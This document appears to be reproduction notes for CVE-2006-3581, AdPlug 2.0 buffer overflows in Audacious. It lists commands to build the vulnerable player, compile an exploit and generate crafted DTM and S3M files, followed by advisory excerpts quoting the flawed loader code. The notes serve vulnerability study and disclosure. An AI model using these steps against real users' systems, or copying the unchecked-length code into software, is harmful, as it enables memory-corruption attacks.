Ubuntu 8.10
wget https://github.com/mudongliang/source-packages/raw/master/CVE-2006-3581/audacious-1.0.0.tgz
tar -xvf audacious-1.0.0.tgz
cd audacious-1.0.0
sudo make install
gcc -o exploit adplugbof.c
./exploit 4 test.dtm
./exploit 5 test.s3m
/usr/local/bin/audacious test.dtm
/usr/local/bin/audacious test.s3m
AdPlug Multiple Remote File Buffer Overflow Vulnerabilities
AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities
The library is affected by various heap and stack overflow vulnerabilities. As intuitable by the types of bugs almost all the unpacking instructions don't verify the size of the destination buffers and trust in the values provided by the same files which are used for allocating the needed buffers (except in the CFF files where it has a fixed size). The following are the parts of bugged code:
D] buffer-overflow in DTM files
From dtm.cpp:
bool CdtmLoader::load(const std::string &filename, const CFileProvider &fp)
char bufstr[80];
for (i=0;i<16;i++)
// get line length
unsigned char bufstr_length = f->readInt(1);
// read line
if (bufstr_length)
for (j=0;j<bufstr_length;j++)
if (!bufstr[j])
bufstr[j] = 0x20;
bufstr[bufstr_length] = 0;
E] buffer-overflow in S3M files
From s3m.cpp:
bool Cs3mPlayer::load(const std::string &filename, const CFileProvider &fp)
unsigned short insptr[99],pattptr[99];
f->seek(checkhead->ordnum, binio::Add);
for(i = 0; i < checkhead->insnum; i++)
insptr[i] = f->readInt(2);
for(i=0;i<checkhead->insnum;i++) {
if(f->readInt(1) >= 2) {
adlibins = true;
delete checkhead;
if(!adlibins) { fp.close(f); return false; }
// load section
f->seek(0); // rewind for load
load_header(f, &header); // read header
for(i = 0; i < header.ordnum; i++) orders[i] = f->readInt(1); // read orders
for(i = 0; i < header.insnum; i++) insptr[i] = f->readInt(2); // instrument parapointers
for(i = 0; i < header.patnum; i++) pattptr[i] = f->readInt(2); // pattern parapointers